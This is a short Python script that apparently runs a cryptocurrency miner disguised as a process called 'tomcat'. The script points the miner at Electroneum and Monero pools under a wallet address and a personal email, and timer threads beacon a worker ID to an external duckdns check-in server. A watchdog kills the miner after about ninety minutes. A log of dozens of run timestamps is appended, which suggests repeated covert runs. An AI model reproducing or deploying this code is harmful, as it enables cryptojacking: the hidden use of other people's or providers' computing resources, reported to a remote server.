import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:05.577433
#2018-02-17 16:03:07.041789
#2018-02-17 17:49:03.536069
#2018-02-17 19:37:06.681261
#2018-02-17 21:27:05.118089
#2018-02-17 23:11:06.212007
#2018-02-18 00:58:05.247202
#2018-02-18 02:46:05.277337
#2018-02-18 04:36:06.284918
#2018-02-18 06:27:03.939140
#2018-02-18 08:15:07.436094
#2018-02-18 10:03:03.491263
#2018-02-18 11:49:06.730255
#2018-02-18 13:33:07.955846
#2018-02-18 15:23:05.645283
#2018-02-18 17:13:04.208484
#2018-02-18 19:01:07.249451
#2018-02-18 20:48:06.395149
#2018-02-18 22:33:06.579051
#2018-02-19 00:21:06.736529
#2018-02-19 02:07:04.192653
#2018-02-19 03:54:05.396972
#2018-02-19 05:38:05.516351
#2018-02-19 07:26:06.802247
#2018-02-19 09:15:09.247715
#2018-02-19 11:06:02.036972
#2018-02-19 12:53:06.482564
#2018-02-19 14:41:04.170007
#2018-02-19 16:31:02.995745
#2018-02-19 18:18:07.087409
#2018-02-19 20:06:01.993694
#2018-02-19 21:56:06.919583
#2018-02-19 23:41:06.348939
#2018-02-20 01:29:06.559024
#2018-02-20 03:18:04.845026
#2018-02-20 05:04:07.327730
#2018-02-20 06:47:06.280216
#2018-02-20 08:34:01.774088
#2018-02-20 10:18:07.687428
#2018-02-20 12:03:09.206418
#2018-02-20 13:49:07.222731
#2018-02-20 15:34:05.450091
#2018-02-20 17:19:01.557214
#2018-02-20 19:10:06.612433
#2018-02-20 20:58:09.078643
#2018-02-20 22:44:02.045244
#2018-02-21 00:27:05.278953
#2018-02-21 02:15:08.689830
#2018-02-21 04:02:01.820055
#2018-02-21 05:49:01.644172
#2018-02-21 07:36:06.773647
#2018-02-21 09:21:04.310201
#2018-02-21 11:11:06.284945
#2018-02-21 12:59:09.850003
#2018-02-21 14:47:09.444986
#2018-02-21 16:36:06.451964
#2018-02-21 18:26:08.915327
#2018-02-21 20:11:07.715326
#2018-02-21 21:58:08.486010
#2018-02-21 23:47:04.547236
#2018-02-22 01:33:06.467537
#2018-02-22 03:21:01.672852
#2018-02-22 05:07:07.361721
#2018-02-22 06:52:04.037790
#2018-02-22 08:41:06.015867
#2018-02-22 10:28:06.022794
#2018-02-22 12:16:12.526786
#2018-02-22 14:01:01.810351
#2018-02-22 15:48:07.616031
#2018-02-22 17:37:04.727433
#2018-02-22 19:24:09.358285
#2018-02-22 21:17:08.068579
#2018-02-22 23:01:06.798937
#2018-02-23 00:47:05.598321
#2018-02-23 02:35:07.339427
#2018-02-23 04:24:03.907377
#2018-02-23 06:11:08.027244
#2018-02-23 07:56:06.903148
#2018-02-23 09:50:09.999290
#2018-02-23 11:55:11.708507
#2018-02-23 13:44:04.878779
#2018-02-23 15:33:06.704839
#2018-02-23 17:24:01.448078
#2018-02-23 19:11:01.236167
#2018-02-23 20:55:06.006653
#2018-02-23 22:42:06.616970
#2018-02-24 00:29:04.752573
#2018-02-24 02:19:01.765136
#2018-02-24 04:08:05.634024
#2018-02-24 05:56:06.163945
#2018-02-24 07:44:07.410973
#2018-02-24 09:31:01.557145
#2018-02-24 11:25:01.449291
#2018-02-24 13:14:03.531859
#2018-02-24 15:04:04.857533
#2018-02-24 16:54:01.315895
#2018-02-24 18:43:04.110376
#2018-02-24 20:34:01.301893
#2018-02-24 22:36:07.350674
#2018-02-25 01:43:07.836053
#2018-02-25 05:23:03.929117
#2018-02-25 11:34:07.658075